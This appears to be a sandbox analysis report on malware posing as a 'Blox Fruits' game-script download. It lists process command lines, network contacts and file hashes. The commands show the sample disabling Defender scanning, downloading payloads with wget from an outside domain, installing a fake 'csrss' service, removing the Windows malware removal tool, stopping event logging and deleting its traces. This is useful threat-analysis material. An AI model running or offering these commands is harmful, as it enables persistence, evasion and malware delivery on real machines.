"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2908 CREDAT:472073 /prefetch:2

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin0222

"C:\Users\Admin\AppData\Roaming\services\plugin0222"

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

"C:\Users\Admin\AppData\Roaming\services\3plugin0222"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "csrss"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "csrss"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\SystemFiles\csrss.exe

C:\ProgramData\SystemFiles\csrss.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\mmc.exe

"C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

Network

Country Destination Domain Proto
US 8.8.8.8:53 lavacht.com udp
US 172.67.174.197:443 lavacht.com tcp
US 172.67.174.197:443 lavacht.com tcp
US 8.8.8.8:53 www.lavalnk.site udp
US 172.67.200.168:443 www.lavalnk.site tcp
US 172.67.200.168:443 www.lavalnk.site tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 solvadordali.com udp
US 8.8.8.8:53 api.bing.com udp
NL 185.14.29.199:80 solvadordali.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
NL 185.14.29.199:80 solvadordali.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 mezla.site udp
NL 185.209.162.106:80 mezla.site tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
NL 194.87.31.18:3333 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script.zip.lljktkt.partial

MD5 4d17e435bf97302e62fbaee2e8bc5e8a
SHA1 7434d6b20ca33d8604e8f6dbb902fbd5e0901b6b
SHA256 c4edd6e41097e35b6dc661942ffca93defaaae050ad65fbbd1c5ac5bb5b392a1
SHA512 19c62bdb1d41db0cd56e9655fbc146bfeb4804312b2122e4c9e0b880737aa3c9f30c679ca83cbf16a6ce69e3572f70aec8a79a57a51a16f61eb1f7ca764079ab

C:\Users\Admin\AppData\Local\Temp\Cab1352.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar1355.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 93808fbe9890af834de2fa0ef460d47f
SHA1 d1efb1edf5e1a4040d7092affefd8ca0f5173e47
SHA256 8e872a1874480dec5f90233f45fa27ae9e6be3927b9f845f800cd97df0622874
SHA512 a6224e2480dd90a3775df8de3f99d1ec5151107e24bc684a63672d69d140c460a3d1f0241b269398eb61b1336272436ec8e5e7c7b00b4dfa60b20016eea092c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8cfdd471af639b0bcb68b688427cdf47
SHA1 47b54a481f234a77661e94fda6641c94703b7961
SHA256 79756e4e90370fe2857e7b94537d801be0c97821e1e757ff5bfbcb98881b4966
SHA512 b6a68e3c4e2b57f8dde8284414eeda6adf4eb73a4012120862c47161ff1c7ef0b23b35ebe9a78c0d0fa93015848eeaca4673885bc47b2a3ed723e8e4e0dcb430

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 03bbbf096f5d8cb998a2deb239b4aef9
SHA1 433b2a927474887dfd1d03eb68c8f9086fd8f9fa
SHA256 380c24a4239d0ee2ca35d01cfe1cdfdd478ccdd2a5bceddd8df063db01f76607
SHA512 ae622435ff98b09afa54976a0e6da3c6ffb8a63610c082510b4587bf15149753629cac4b93351dd95a8a20caed9379e786df5e4eb91f660e936a81fb9363ed79

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a39d669838a6ad6c05209abd840f4cbd
SHA1 28d2761fcd5bdc61845075d7dcaa832e5684e31e
SHA256 1ead5abe4133003232d55870084de4831c35d49f6001f1091e103da6dba97643
SHA512 6fa81c2567284cdd2cf9638e03a59197432cc44efb50a36c5402be51ff79e06f2794584ae7794013e2d8dccf5dd856edba5374fba325f4c967179cd98fae1488

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 41ab7c37e05ede90f40136484a80b32f
SHA1 15018755845ef4dcfab54c1d89dfa31700d4b2fe
SHA256 7bb4553a7fd7d6bc2d3fe67ef9244da288d22fc8f63dbe91d8c8fefcababaa7f
SHA512 b3c8da7b608c47c87e6a5c92b3ffb8337220018eb48a37a884cf2b0f11a411ac4b8f1a15ed77f93a506afffcd05f9695eb26d6197ff1b5d1e21aaeeaf44b969d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d5f8d35451f89e2650d075447afda26e
SHA1 8727a4b072f7f4c0f8697e5ebeb8a54f082d9910
SHA256 1e97c5d852e0c43015dd2d04a0c1c67a341f8e5ddbe8c5058fbbe77d5fbd04d9
SHA512 d50f4c9e761f15266beff0c263ad224bb0524e6660e19346892c24300275b9f6ec989a7e972913a95a961ff06593643916d2c6f6b79851eed96f6030ae5623af

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 585a352252db20aff204cd442b0819e1
SHA1 f2152ac2dd0918c5b22d45148d6dffdc4311c14d
SHA256 350525beb183d5d9192f4e06039895424ec564f4b9a077dbbb017e9f41d4ebe9
SHA512 ff64379f360fc2e695f99b76dcf32adf1949c57d8b511b875a2b23e736612f02a71915bdd41ffec738234f65aa3f5355b8f0b014652946d84200f52dca7e1799

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 608ac3bce0e9b59ecc4243a0c0b33599
SHA1 3d4cc56d06d1a674f008de21b939d1b610666186
SHA256 e2a785273d470934285f8bab223e601d37862d44caee4410ba95aa556415ad44
SHA512 b5bdb8223abd91437c0a6134eebc0f99c670df8c5717779aad2bb381fa052c08e0b9f17c59bc5f243aed87eb7e121f08f1eaef4e0904128d699a58bff3d9347a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 240c485a60c1affb8fd54cc992c0ba0c
SHA1 2edf21d263f01f4af1cde311ff09666afe83288c
SHA256 85cdb00e4d26aa10cbc2dc08ed125ccf3d600f86130a65cfb3b1f0d61740515d
SHA512 ec9fc5586173640b0ecdc106c7255233b6671828177d60d407e517bf0e40054514c419da03d63ed91d784bda29552a0197b91fda83dd1f4b867e44e28fd2c7f3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d827d34704a96e8e9193f37684a38431
SHA1 197487f64cc4b2f1f054030f91c9faeff1607b4e
SHA256 5c09101f8cafe10bfbda36caa026a8e2f17e1ec65f685ef570411ee80a158674
SHA512 50dee98799d8570efafb4b4693e183b72925a77b8c2c38927b2c0e94141d45a60ff491bfb7155c537ef3d1c8af99f4227cddd1ec499d0c8e48af017df61c7d95

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe

MD5 fea10d11d84919cb9a0a0752d61c0a66
SHA1 aea3c65e2b62851b2dd112597f28379b49c58a0a
SHA256 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7
SHA512 e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.dll

MD5 32e7556ff4f5256d15e1fc843cee5e3d
SHA1 b7283061428e9ca741c26dcfc3e869e2fc699f0b
SHA256 b2f5dfcba2018e9b4314c245f6391783bd3717fe02fec3e6edf1b9d1a3801278
SHA512 d39ca3fd8edb7db7e19655ea3aa69d8b0a4008514ed356808b59f7cdf4c109b7efd0ed54f6ea099d37b33f107f234adc4f01a178c90961e88d3c9ed7a8ebe40e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe.manifest

MD5 1b6de83d3f1ccabf195a98a2972c366a
SHA1 09f03658306c4078b75fa648d763df9cddd62f23
SHA256 e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724
SHA512 e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

memory/1268-6822-0x00000000001A0000-0x00000000001A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\WinRAR.exe

MD5 f59f4f7bea12dd7c8d44f0a717c21c8e
SHA1 17629ccb3bd555b72a4432876145707613100b3e
SHA256 f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA512 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\wget.exe

MD5 8c04808e4ba12cb793cf661fbbf6c2a0
SHA1 bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256 a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA512 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\Launhcer.exe.manifest

MD5 f0fc065f7fd974b42093594a58a4baef
SHA1 dbf28dd15d4aa338014c9e508a880e893c548d00
SHA256 d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693
SHA512 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\Launhcer.exe

MD5 e5c00b0bc45281666afd14eef04252b2
SHA1 3b6eecf8250e88169976a5f866d15c60ee66b758
SHA256 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903
SHA512 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\Launhcer.dll

MD5 7de0541eb96ba31067b4c58d9399693b
SHA1 a105216391bd53fa0c8f6aa23953030d0c0f9244
SHA256 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e
SHA512 e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\data\Launcher.dll

MD5 f58866e5a48d89c883f3932c279004db
SHA1 e72182e9ee4738577b01359f5acbfbbe8daa2b7f
SHA256 d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12
SHA512 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ac15d0fb1bac3ae1ad7cf6801bf2efe6
SHA1 c99cae817f05fcdd1975e28b2f96d875c1ae6b26
SHA256 0fdf155e43cb4569da72de7acdbeb426b52978ee1dd603697e8eb5d232b1d1cf
SHA512 2daced9bca246382abea835cfe6380a7a7cda550de314c6d6d4f349200d8dd23aa22357157e3d8aef3580e848e02580f50b05359dcdb54544ab2cf761ca305e8

memory/2144-7000-0x0000000000170000-0x0000000000171000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa06366bb7d6ad9a80b331e08d588c5a
SHA1 7d0d32bf76a9f53883cf4541728fc823f71aa5be
SHA256 fa65b08428fad3f527806d4acd68c0963b5502ca4fc8e9f143a80fb9b8ac42b3
SHA512 5a0e8ccd92cbba27a7c84ec40582a4dcb30f32da9dbd97c59acdf874cafb4551ae2af163a56f894fad8c3fbe57c651158cfb26fbdd0afd3a4c78f02b97464f27

memory/2868-7057-0x0000000072E90000-0x000000007343B000-memory.dmp

memory/2868-7058-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/1952-7163-0x0000000000090000-0x0000000000091000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9a42087679a72175edc71f9548b7389d
SHA1 b922f3e042e2381709975448ac5ac9128c163a16
SHA256 81fa3c3b9d581d7d5a36ac971462e44fb04d6eaec6c1d4f7aa3c4dbc65a15290
SHA512 f336d5a756bc53ef080d4d606033c267bcae1e5cbf0eff0ffe6aab44fad28bb0cd32dc26a00c58885429e6349a863c4e9ade9e2759fce4c17f5fba251632b1df

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ea48376ea98693175feee7f9bf41401f
SHA1 729afb95bb237e451b601ffa89a4c22560992343
SHA256 fd0ab84a2961e8dc3652606ceb7435e7b94f930525a9de1ff4e7a6b7d02011a5
SHA512 d5bb97b0e15a5b1ec89c70860929958d2f0b43a9bb8dc413f8b92c374a009c7cada49466afee04fa8432bbaf23488e45014aa364a7574c86665b4f3d166d6729

memory/2420-7205-0x0000000072E90000-0x000000007343B000-memory.dmp

memory/2420-7241-0x00000000003D0000-0x0000000000410000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b06c2ee18f7dcf13699c8d9634d87354
SHA1 f504b2729d7c86500d30ed01fddc768d6ed543c4
SHA256 f94717a2880ad65261ac90ebb812ba996c8597ccec3df625e12fec4f63d08006
SHA512 dc8cd36bb7aafca579ee78bbf50894fe54d9724a3d4d7cb29b456820bee352c8d3b59c3f4c77d2a6e45f038c2e3127d7e94b6b1a3ff4e3fa3124c57cc82e9393

memory/2420-7278-0x0000000072E90000-0x000000007343B000-memory.dmp

memory/2536-7331-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\01plugins0222.rar

MD5 192ea396deb46406bed716cde8b0fda6
SHA1 b48459b0e4f8d712150c2db39764d3658678f8ac
SHA256 c56f6db940d4802fce1621bd03c3563869acc5ccf2f8fc7ef6a4cc5d17e0c04d
SHA512 359fb7a51a6524e5fab57de6b799082e3c9d0582cf0a01a5535d11c02c09803a59da47c5a1d65d6306631fa31e4eb8a03479aec5c877d7e4157f3c60ebeda6e1

memory/2868-7343-0x0000000072E90000-0x000000007343B000-memory.dmp

\Users\Admin\AppData\Roaming\services\plugin0222

MD5 17d804b82a9cae6218607478d6213aae
SHA1 f5ff7adb303f6dfe07a86f0dc58ae3d2dd3c3b6f
SHA256 506c268dd0361e0bec3f2da64ba330cb56ea566fa3a1a6360519b9844ec6cddd
SHA512 ce0983032550ea02b685b132ccc29d2263fbdd189a36bbd89bd9af44fdc5ce1c2446b4ea6af67ceb474880386b1a3ada33aea9ac157a029e15b55e49e39067a8

\Users\Admin\AppData\Roaming\services\wget.exe

MD5 d14ec6e14236a8898499a7a5a87ab3d5
SHA1 a3747325bc0c726804eb450b3076b0b6f442ce0b
SHA256 cca5b49a93b4c81fca0b0508c6eaed37212d19ea312076d85f7ce3d08c95761a
SHA512 e05cc093c8a97f805de9308327f80503e0de25ff78ae535112f449ad30acd61a5c36e37a624443fd6846d31a43102c215a9063e7c924ed2353e2705a2579bfb9

C:\Users\Admin\AppData\Roaming\services\wget.exe

MD5 62185595bbcf4b826eb5469666bc714c
SHA1 5ef3394be9b9a80677cacc40a2ba641ae3de0f39
SHA256 ed5b8830d0bce2d9ea7aa0d9d90cbf9b906695096767a8040288e0024ad78e26
SHA512 262d0fb0507bf29c838a0cc1dca68212667934723da5e3e9b40aa84b0676d5ecc62da36e5fec98ba9e43e9bff1a2d7e347a84c07ad739b1e1c337cebe7c167cc

\Users\Admin\AppData\Roaming\services\wget.exe

MD5 d02a0e17e3ade8ec1ab61ced33eaec93
SHA1 60e6aeaf415828ecebcd4373a4bec2eab8a7d010
SHA256 16834e17a49782a872e6ee3f5dd59df81083aad44eaac645a608220ec9ffbb92
SHA512 e2e47069dba10063edbe949786fa065b03d9ba93d7fd14f7d7a43b891a224978e777c5df1230fa11ff8a56f892aaca576983ebae1a16e561c8643f95c6f18b47

memory/1532-7351-0x000000006CE20000-0x000000006D50E000-memory.dmp

memory/1532-7350-0x0000000000F40000-0x0000000000FC8000-memory.dmp

memory/2868-7352-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/1532-7353-0x0000000000960000-0x00000000009A0000-memory.dmp

\Users\Admin\AppData\Roaming\services\plugin0222

MD5 2221f8d947b36413f6e93c4413f63b4f
SHA1 e4c87a75793aeb043e73fff0700479184e3113a5
SHA256 d8620d495b4af8206d8eb7464d0444e38f8c12635b8cf8164f9982806266b3d5
SHA512 8045ec66404485540dd4fcacbaef09c27e3e7b20ae54eb1ffd7dc923a74b12c8bed850625c511fc1ebb670ae65ff13a5ad4d40ce91bfaed884ca3db511b20ead

memory/2616-7355-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7357-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7359-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7363-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2616-7365-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7361-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\plugin0222

MD5 b9024ee0cd898c2478d32759854330da
SHA1 e7f7b1187716a28b4062d77ecf6deaeb1d170ec5
SHA256 006b1c6174de020bee4d71dc164fb60b755a4d0f788bbe451de0185ef3dc8715
SHA512 5e44e23c5f43ed9a2e35f15c37823b32fcfe1877ece750d75d7a17ae5515303d8d627f0012c72866e8baa317690d386a3e9d5b123cd900a7a7a75376e08bbc63

memory/2616-7362-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7360-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1532-7368-0x000000006CE20000-0x000000006D50E000-memory.dmp

memory/2616-7369-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7371-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7372-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2616-7377-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2796-7380-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

MD5 9841c90a8e1036a830b34e3fe5bb578f
SHA1 1245118f53dec80d4f64a814681dbe65883f090e
SHA256 60ba723c96a3b804394bffae77294f8b2a7758bd592adaa01cbb89f25e077277
SHA512 8188bc2083a9e129c67891099e48702e34d845d74fff5d7ff39e5b2c2a95820192c7fa76a4b101dfca858a488a4779ab3228edc6effdf75359c8f7376d66bb9f

C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar

MD5 82a56a666981e9e163a1aba74dc70aa8
SHA1 709e44e71ff38d0771d839b74f270c23daa42f64
SHA256 c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6
SHA512 ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0

\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 49374c74e524d997af0529fbf5133085
SHA1 931c13b4fe8133174bd285ec981cbac2c8594242
SHA256 ba23953bf3c981aac499b2031ae27804271b82428830697c83bb8618f73750f0
SHA512 9334bbde62cd443a01d5df3cc3495e816ffb398a4695cd122cd8a4c106344faa9c1dc223c3559a250ef8991af7b4c4eb7d8157765457a8de367a47e483913fef

C:\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 fcbd619ee96ee0643df00e6b734efb07
SHA1 167e2f677c7436d0ea0e512832d78703cc836746
SHA256 e8d4a10a17c4d53e76bde1f17a34a3d1e6a4ae6ed5e1ad30f7a9917b410dea7c
SHA512 290249e2e715c96bbd8d437c3c3357cc48cbc287aa28f24af4db0979d80399a93f9ca9e4b82555e496462fb8acfa6b054e8a73b3d37be9ee5e769b8b5e30a43f

C:\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 a9b0aa2221894c057418cfbb7b329cc6
SHA1 65ea3e508f8c7187300bb715023cbdae2d9c678f
SHA256 2bc6e0c51aeab2cd16f37202ada64236fe768f77923eef5e8dabab8c9a48dd14
SHA512 88b2eaffdcfc8b0dbebb6a9eb8a1f7f516f48c8242b9d60973dd9948d016e73640ca521ff298551f598cf21aff85e96d0134da46be3c63e33ffa30800663b2f2

memory/1952-7391-0x00000000055B0000-0x0000000005F45000-memory.dmp

\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 cb83155891d53b42959e865284e24749
SHA1 b4e88c5cd247f010570a32870458d32df30e1bab
SHA256 b4b8f7c546693623a9b248d82fd63c59a7a2d927fc1b68d88ff4763092922001
SHA512 55ba718c1b13627601a917a46d41720ddff7e959704730cee333262fc032125ffd270f87741be67e3d01e7228ef621aac75153daec5fc6c0a85542762a30f7df

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 d260c37db350fad71fd6a6a0db7873df
SHA1 6fef3b164d10b78060ca17aae0c1f74c4b28f9fe
SHA256 bd74429d83665bf93ac9feeae7fd1c7ed8b7625f64797a4485c12c5d077aef27
SHA512 ec534dae4c0dd20e0064d41a97b73cf2c50c506ebffffe94529704a22abea9c9b11c53eb24396ea18bf48e53b9053c26085272917ab10865078d4ac2a944b784

C:\Users\Admin\AppData\Roaming\services\wget.exe

MD5 96a05948b743969cbe7777c92aa1035e
SHA1 3c0e308b4607507e7f88def554fbff46a949f651
SHA256 c6b38c11bfb082f8e3b10ad8b4ccdd35216a5e9a4599c563eab45f4d72137e37
SHA512 fc20eb68f626e6051b3d981e4044161de5c2d6f9fa66fbdd92fb83aa19f6d0d93b3edc6062544e2610872a31f2b2597d82c06f857a999210c37da1f79af16fd6

memory/996-7396-0x000000013F890000-0x0000000140225000-memory.dmp

memory/1952-7397-0x00000000055B0000-0x0000000005F45000-memory.dmp

memory/2980-7406-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\03plugins0222.rar

MD5 01fc57f316d8752c5cc798a6211a6528
SHA1 df729cf06971f2b99e6909d2882ed73c790e68b5
SHA256 a0243273a73c5e9165fcafcb399c730621a862f4538403dc3f2d70a5bbba4abb
SHA512 7fe3a5e86145640e2d99ebe59715705f2888924fb1ecab0de65e84dc93121c2ec8b336236546b28d3b0efd520e5405190d6aba20c38baa848286368a1277f520

\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 5a2054b9f1ea5c091c993d99671ccd4c
SHA1 0e31d6da2558e5a5639e871cded0fb178e15821c
SHA256 6855fa5fdf49aad9901ff12ec4f7fe963148021fcdb72d6ea6bcb6327af2c757
SHA512 6c43eefb7ca0f061fae83c49b5293291d4fb295cae80bea93df110ce2cd2b926c21e30bce6117e7d8bc2fe4f6593372dd0e6a98961d92e4740816a5dcbc17019

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 405daf28c1f8f1f8de13c82c1a9a1a10
SHA1 cbb8c27dedaaace4a0a97b508de3b47f3ba03c85
SHA256 f9dafa037600b645d84ad318a80da7707c66207165a39cb53608564a52b1467c
